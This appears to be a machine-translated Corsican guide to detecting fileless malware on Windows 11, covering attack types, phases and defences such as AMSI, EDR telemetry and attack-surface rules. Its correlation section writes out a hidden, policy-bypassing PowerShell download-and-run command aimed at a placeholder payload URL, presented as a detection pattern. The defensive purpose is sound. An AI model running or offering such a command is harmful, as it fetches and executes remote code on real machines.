Cumu rilevà malware periculosu senza fugliali in Windows 11

¿Cumu rilevà malware periculosu senza fugliali? L'attività d'attaccu senza file hè cresciuta significativamente, è per aggravà e cose, Windows 11 ùn hè micca immuneQuestu approcciu ignora u discu è si basa nantu à a memoria è l'arnesi di sistema legittimi; hè per quessa chì i prugrammi antivirus basati nantu à a firma anu difficultà. Sè vo circate un modu affidabile per rilevallu, a risposta si trova in a cumbinazione telemetria, analisi di u cumpurtamentu è cuntrolli di Windows.

In l'ecosistema attuale, e campagne chì abusanu di PowerShell, WMI, o Mshta coesistenu cù tecniche più sofisticate cum'è l'iniezioni di memoria, a persistenza "senza tuccà" u discu, è ancu abusi di firmwareA chjave hè di capisce a mappa di e minacce, e fasi di l'attaccu, è quali segnali lascianu ancu quandu tuttu accade in a RAM.

Chì ghjè un malware senza file è perchè hè una preoccupazione in Windows 11?

Quandu parlemu di minacce "senza file", ci riferimu à codice maliziosu chì Ùn avete bisognu di deposità novi eseguibili. in u sistema di fugliali per funziunà. Di solitu hè injectatu in i prucessi in esecuzione è eseguitu in a RAM, basendu si nantu à interpreti è binari firmati da Microsoft (per esempiu, PowerShell, WMI, rundll32, mshtaQuestu riduce a vostra impronta è vi permette di bypassà i motori chì cercanu solu i fugliali suspetti.

Ancu i ducumenti d'uffiziu o i PDF chì sfruttanu e vulnerabilità per lancià i cumandamenti sò cunsiderati parte di u fenomenu, perchè attivà l'esecuzione in memoria senza lascià binarii utili per l'analisi. Abusu di macro è DDE In Office, postu chì u codice funziona in prucessi legittimi cum'è WinWord.

L'attaccanti combinanu l'ingegneria suciale (phishing, ligami spam) cù trappule tecniche: u cliccu di l'utilizatore inizia una catena in a quale un script scarica è esegue u payload finale in memoria, evitendu di lascià una traccia nant'à u discu. L'ubbiettivi varieghjanu da u furtu di dati à l'esecuzione di ransomware, à u muvimentu laterale silenziu.

Tipologie per impronta in u sistema: da "puri" à ibridi

Per evità cuncetti cunfusi, hè utile separà e minacce per u so gradu d'interazzione cù u sistema di fugliali. Questa categurizazione chiarisce Chì persiste, induve si trova u codice, è chì segni lascia ?.

Tipu I: nisuna attività di schedariu

Un malware cumpletamente senza fugliali ùn scrive nunda nant'à u discu. Un esempiu classicu hè u sfruttamentu di un vulnerabilità di a rete (cum'è u vettore EternalBlue in u passatu) per implementà una backdoor chì reside in a memoria di u kernel (casi cum'è DoublePulsar). Quì, tuttu succede in a RAM è ùn ci sò micca artefatti in u sistema di fugliali.

Un'altra opzione hè di contaminà u firmware di cumpunenti: BIOS/UEFI, adattatori di rete, periferiche USB (tecniche di tipu BadUSB) o ancu sottosistemi CPU. Persistenu dopu à riavvii è reinstallazioni, cù a difficultà aghjunta chì Pochi prudutti verificanu u firmwareQuessi sò attacchi cumplessi, menu frequenti, ma periculosi per via di a so furtività è di a so durabilità.

Tipu II: Attività d'archiviazione indiretta

Quì, u malware ùn "lascia" micca u so propiu eseguibile, ma usa cuntenitori gestiti da u sistema chì sò essenzialmente almacenati cum'è fugliali. Per esempiu, backdoor chì piantanu Cumandamenti PowerShell in u repositoriu WMI è attivà a so esecuzione cù filtri d'eventi. Hè pussibule installallu da a linea di cummanda senza eliminà i binari, ma u repositoriu WMI reside nantu à u discu cum'è una basa di dati legittima, ciò chì rende difficiule a pulizia senza affettà u sistema.

Da un puntu di vista praticu sò cunsiderati senza file, perchè quellu container (WMI, Registru, ecc.) Ùn hè micca un eseguibile classicu rilevabile È a so pulizia ùn hè micca triviale. U risultatu: persistenza furtiva cù poca traccia "tradiziunale".

Tipu III: Richiede fugliali per funziunà

Certi casi mantenenu un persistenza "senza file" À un livellu logicu, anu bisognu di un trigger basatu annantu à i fugliali. L'esempiu tipicu hè Kovter: registra un verbu di shell per una estensione aleatoria; quandu un fugliale cù quella estensione hè apertu, un picculu script chì usa mshta.exe hè lanciatu, chì ricustruisce a stringa maligna da u Registru.

U truccu hè chì sti fugliali "esca" cù estensioni aleatorie ùn cuntenenu micca un payload analizabile, è a maiò parte di u codice si trova in u Registrà (un altru cuntinadore). Hè per quessa ch'elli sò classificati cum'è senza fugliali in impattu, ancu s'è strettamente parlante dipendenu da unu o più artefatti di discu cum'è trigger.

Vettori è "ospiti" di l'infezzione: induve entra è induve si piatta

Per migliurà a rilevazione, hè vitale di cartografà u puntu d'entrata è l'ospite di l'infezzione. Questa perspettiva aiuta à cuncepisce cuntrolli specifichi Priurità a telemetria adatta.

Sfrutta

• Basatu nantu à i fugliali (Tipu III): I ducumenti, l'eseguibili, i fugliali Flash/Java legacy, o i fugliali LNK ponu sfruttà u navigatore o u mutore chì li processa per caricà u shellcode in memoria. U primu vettore hè un fugliale, ma u payload viaghja in RAM.
• Basatu in rete (Tipu I): Un pacchettu chì sfrutta una vulnerabilità (per esempiu, in SMB) riesce à esse eseguitu in l'area di l'utente o in u kernel. WannaCry hà pupularizatu questu approcciu. Caricamentu direttu di a memoria senza novu schedariu.

Ferramenta

• Dispositivi (Tipu I): U firmware di u discu o di a carta di rete pò esse mudificatu è u codice introduttu. Difficile da ispezionà è persiste fora di u sistema operativu.
• CPU è sottosistemi di gestione (Tipu I): Tecnulugie cum'è ME/AMT d'Intel anu dimustratu percorsi versu Rete è esecuzione fora di u sistema operativuAttacca à un livellu assai bassu, cù un altu putenziale di furtività.
• USB (Tipu I): BadUSB vi permette di riprogrammà una unità USB per impersonà una tastiera o una carta di rete è lancià cumandamenti o redirige u trafficu.
• BIOS/UEFI (Tipu I): riprogrammazione di firmware maliziosa (casi cum'è Mebromi) chì funziona prima di l'avvio di Windows.
• Ipervisore (Tipu I): Implementazione di un mini-ipervisore sottu à u sistema operativu per ammuccià a so presenza. Raru, ma digià osservatu in forma di rootkit di l'ipervisore.

Esecuzione è iniezione

• Basatu nantu à i fugliali (Tipu III): EXE/DLL/LNK o attività pianificate chì lancianu iniezioni in prucessi legittimi.
• Macro (Tipu III): VBA in Office pò decifrà è eseguisce payload, cumpresu u ransomware cumpletu, cù u cunsensu di l'utilizatore per via di l'ingannu.
• Scripts (Tipu II): PowerShell, VBScript o JScript da u schedariu, linea di cummanda, servizii, Registrazione o WMIL'attaccante pò scrive u script in una sessione remota senza tuccà u discu.
• Registrazione d'avvio (MBR/Avvio) (Tipu II): E famiglie cum'è Petya sovrascrivenu u settore di avviu per piglià u cuntrollu à l'avviu. Hè fora di u sistema di fugliali, ma accessibile à u sistema operativu è à e soluzioni muderne chì ponu restaurallu.

Cumu funzionanu l'attacchi senza file: fasi è segnali

Ancu s'elli ùn lascianu micca fugliali eseguibili, e campagne seguitanu una logica graduale. Capisceli permette di monitorà. avvenimenti è relazioni trà prucessi chì lascianu una traccia.

• Accessu inizialeAttacchi di phishing chì utilizanu ligami o allegati, siti web compromessi o credenziali arrubati. Parechje catene cumincianu cù un documentu Office chì attiva un cumandamentu PowerShell.
• Persistenza: backdoors via WMI (filtri è abbonamenti), Chjavi d'esecuzione di u Registru o attività pianificate chì riavvianu i script senza un novu schedariu maliziosu.
• EsfiltrazioneUna volta chì l'infurmazione hè stata raccolta, hè mandata fora di a rete aduprendu prucessi di fiducia (navigatori, PowerShell, bitsadmin) per mischjà u trafficu.

Stu mudellu hè particularmente insidiosu perchè indicatori d'attaccu Si piattanu in a nurmalità: argumenti di linea di cummanda, concatenazione di prucessi, cunnessione in uscita anomale, o accessu à l'API d'iniezione.

Tecniche cumuni: da a memoria à a registrazione

L'attori si basanu nantu à una varietà di metudi chì ottimisanu a furtività. Hè utile cunnosce i più cumuni per attivà una rilevazione efficace.

• Residente in memoriaCaricamentu di carichi utili in u spaziu di un prucessu di fiducia chì aspetta l'attivazione. rootkit è hooks In u kernel, alzanu u livellu di dissimulazione.
• Persistenza in u RegistruSalvate i blob criptati in chjave è reidratateli da un launcher legittimu (mshta, rundll32, wscript). L'installatore effimeru pò autodistrughjesi per minimizà a so impronta.
• Phishing di credenzialiAduprendu nomi d'utilizatori è password arrubati, l'attaccante esegue shell è piante remote. accessu silenziu in u Registru o WMI.
• Ransomware "senza file"A crittografia è a cumunicazione C2 sò orchestrate da a RAM, riducendu l'opportunità di rilevazione finu à chì u dannu sia visibile.
• Kit operativi: catene automatizate chì rilevenu e vulnerabilità è implementanu payload solu di memoria dopu chì l'utente clicca.
• Documenti cù codice: macro è meccanismi cum'è DDE chì attivanu cumandamenti senza salvà eseguibili nantu à u discu.

Studi di l'industria anu digià mostratu picchi notevuli: in un periodu di u 2018, un aumentu di più di 90% in attacchi basati nantu à script è in catena PowerShell, un segnu chì u vettore hè preferitu per a so efficacia.

A sfida per l'imprese è i fornitori: perchè u bluccu ùn hè micca abbastanza

Saria tentatore di disattivà PowerShell o di pruibisce i macro per sempre, ma Interromperesti l'operazionePowerShell hè un pilastru di l'amministrazione muderna è Office hè essenziale in l'imprese; bluccallu à l'aveugla ùn hè spessu micca fattibile.

Inoltre, ci sò modi per bypassà i cuntrolli basi: eseguisce PowerShell attraversu DLL è rundll32, imballà script in EXE, Purtate a vostra propria copia di PowerShell o ancu piattà i scripts in l'imagine è estralli in memoria. Dunque, a difesa ùn pò esse basata solu nantu à a negazione di l'esistenza di strumenti.

Un altru sbagliu cumunu hè di delegà tutta a decisione à u cloud: se l'agente deve aspittà una risposta da u servitore, Perdite a prevenzione in tempu realeI dati di telemetria ponu esse caricati per arricchisce l'infurmazione, ma u A mitigazione deve accade à u puntu finale.

Cumu rilevà u malware senza file in Windows 11: telemetria è cumpurtamentu

A strategia vincente hè monitorà i prucessi è a memoriaMicca schedari. I cumpurtamenti maliziosi sò più stabili chè e forme chì un schedariu piglia, ciò chì li rende ideali per i motori di prevenzione.

• AMSI (Interfaccia di Scansione Antimalware)Intercetta i script PowerShell, VBScript, o JScript ancu quandu sò custruiti dinamicamente in memoria. Eccellente per catturà stringhe offuscate prima di l'esecuzione.
• Monitoraghju di u prucessu: principiu/fine, PID, genitori è figlioli, percorsi, linee di cumanda è hash, più arburi d'esecuzione per capisce a storia cumpleta.
• Analisi di a memoria: rilevazione di iniezioni, carichi riflettenti o PE senza toccà u discu, è revisione di regioni eseguibili inusuali.
• Prutezzione di u settore di partenza: cuntrollu è restaurazione di u MBR/EFI in casu di manomissione.

In l'ecosistema Microsoft, Defender for Endpoint combina AMSI, monitoraghju di u cumpurtamentuA scansione di memoria è l'apprendimentu automaticu basatu annantu à u cloud sò aduprati per scalà e rilevazioni contr'à varianti nove o offuscate. Altri venditori utilizanu approcci simili cù motori residenti in u kernel.

Esempiu realisticu di currelazione: da u documentu à PowerShell

Imagine una catena induve Outlook scarica un allegatu, Word apre u documentu, u cuntenutu attivu hè attivatu è PowerShell hè lanciatu cù parametri suspetti. Una telemetria adatta mostrerebbe u linea di cummanda (per esempiu, ExecutionPolicy Bypass, finestra nascosta), cunnettendu si à un duminiu micca fiduciale è creendu un prucessu figliolu chì s'installa in AppData.

Un agente cù un cuntestu lucale hè capace di ferma è retrocede attività maliziosa senza intervenzione manuale, in più di notificà u SIEM o via email/SMS. Certi prudutti aghjunghjenu un stratu d'attribuzione di a causa principale (mudelli di tipu StoryLine), chì ùn punta micca à u prucessu visibile (Outlook/Word), ma à u filu maliziosu cumpletu è a so origine per pulisce cumpletamente u sistema.

Un mudellu di cumanda tipicu à fighjà puderia esse cusì: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');A logica ùn hè micca a stringa esatta, ma l'inseme di signali: bypass di pulitica, finestra nascosta, scaricamentu chjaru è esecuzione in memoria.

AMSI, pipeline è rolu di ogni attore: da u puntu finale à u SOC

Oltre à a cattura di script, una architettura robusta orchestra passi chì facilitanu l'investigazione è a risposta. Più evidenza ci hè prima di eseguisce u caricu, megliu hè., megliu.

• Intercettazione di scriptAMSI furnisce u cuntenutu (ancu s'ellu hè generatu à a mosca) per l'analisi statica è dinamica in una pipeline di malware.
• Eventi di prucessuPID, binari, hash, rotte è altri dati sò raccolti. argumenti, stabilendu l'arburi di prucessu chì anu purtatu à carica finale.
• Rilevazione è segnalazioneI rilevamenti sò visualizati nantu à a cunsola di u produttu è trasmessi à e piattaforme di rete (NDR) per a visualizazione di a campagna.
• Garanzie di l'utenteAncu s'è un script hè injectatu in memoria, u framework L'AMSI l'intercetta in versioni cumpatibili di Windows.
• Capacità di l'amministratore: cunfigurazione di pulitica per attivà l'ispezione di script, bloccu basatu annantu à u cumpurtamentu è creà rapporti da a cunsola.
• Travagliu SOCestrazione di artefatti (UUID di VM, versione di u sistema operativu, tipu di script, prucessu iniziatore è u so genitore, hash è linee di cummandu) per ricreà a storia è regule di l'ascensore futuru.

Quandu a piattaforma permette l'esportazione di buffer di memoria Assuciati à l'esecuzione, i circadori ponu generà novi rilevamenti è arricchisce a difesa contr'à varianti simili.

Misure pratiche in Windows 11: prevenzione è caccia

In più di avè EDR cù ispezione di memoria è AMSI, Windows 11 vi permette di chjude i spazii d'attaccu è di migliurà a visibilità cù cuntrolli nativi.

• Registrazione è restrizioni in PowerShellAttiva a registrazione di blocchi di script è a registrazione di moduli, applica modi ristretti induve pussibule, è cuntrolla l'usu di Bypass/Piattu.
• Regole di Riduzione di a Superficie d'Attaccu (ASR): blocca l'avvii di script da i prucessi di Office è Abusu di WMI/PSExec quandu ùn hè micca necessariu.
• Pulitiche macro di l'uffiziu: disattiva per difettu, a firma interna di macro è e liste di fiducia stretta; monitorizza i flussi DDE legacy.
• Audit è Registru WMI: surveglia l'abbonamenti à l'eventi è e chjave d'esecuzione automatica (Run, RunOnce, Winlogon), è ancu a creazione di attività pianificatu.
• Prutezzione di l'avviu: attiva Secure Boot, verifica l'integrità MBR/EFI è valida chì ùn ci sò micca mudificazioni à l'avviu.
• Rattoppatura è indurimentuchjude e vulnerabilità sfruttabili in i navigatori, i cumpunenti di Office è i servizii di rete.
• Cuscenza: forma l'utilizatori è e squadre tecniche in phishing è signali di esecuzioni clandestine.

Per a caccia, fucalizza nantu à e dumande nantu à: creazione di prucessi da Office versu PowerShell/MSHTA, argumenti cù scaricamentu di stringa/scaricamentu di schedariuScripts cù offuscazione chjara, iniezioni riflessive è rete in uscita versu TLD suspettosi. Incruciate questi signali cù a reputazione è a frequenza per riduce u rumore.

Chì pò rilevà ogni mutore oghje ?

E suluzioni per l'imprese di Microsoft combinanu AMSI, analisi cumportamentale, esaminà a memoria è a prutezzione di u settore di avviu, più mudelli ML basati in nuvola per scalà contr'à e minacce emergenti. Altri venditori implementanu u monitoraghju à livellu di kernel per distingue u software maliziosu da quellu benignu cù u rollback automaticu di i cambiamenti.

Un approcciu basatu annantu à storie d'esecuzione Vi permette di identificà a causa principale (per esempiu, un allegatu Outlook chì attiva una catena) è di mitigà tuttu l'arburu: script, chjave, attività è binari intermedi, evitendu di stà bluccati nantu à u sintomu visibile.

Errori cumuni è cumu evità li

Bluccà PowerShell senza un pianu di gestione alternativu ùn hè micca solu impraticabile, ma ci sò ancu modi per invucallu indirettamenteU listessu vale per e macro: o li gestite cù pulitiche è firme, o l'impresa ne soffrirà. Hè megliu fucalizza si nantu à a telemetria è e regule di cumpurtamentu.

Un altru sbagliu cumunu hè di crede chì l'applicazioni di whitelist risolvenu tuttu: a tecnulugia senza fugliali si basa precisamente nantu à questu. app di fiduciaU cuntrollu deve osservà ciò ch'elli facenu è cumu si rilazionanu, micca solu s'elli sò permessi.

Cù tuttu ciò chì hè statu dettu sopra, u malware senza file cessa d'esse un "fantasma" quandu si monitorizza ciò chì importa veramente: cumpurtamentu, memoria è origini di ogni esecuzione. A cumbinazione di AMSI, telemetria di prucessu ricca, cuntrolli nativi di Windows 11 è un stratu EDR cù analisi cumportamentale vi dà u vantaghju. Aghjunghjite à l'equazione pulitiche realistiche per macro è PowerShell, audit WMI/Registru è caccia chì dà priorità à e linee di cummandu è à l'arburi di prucessu, è avete una difesa chì taglia queste catene prima ch'elle facenu un sonu.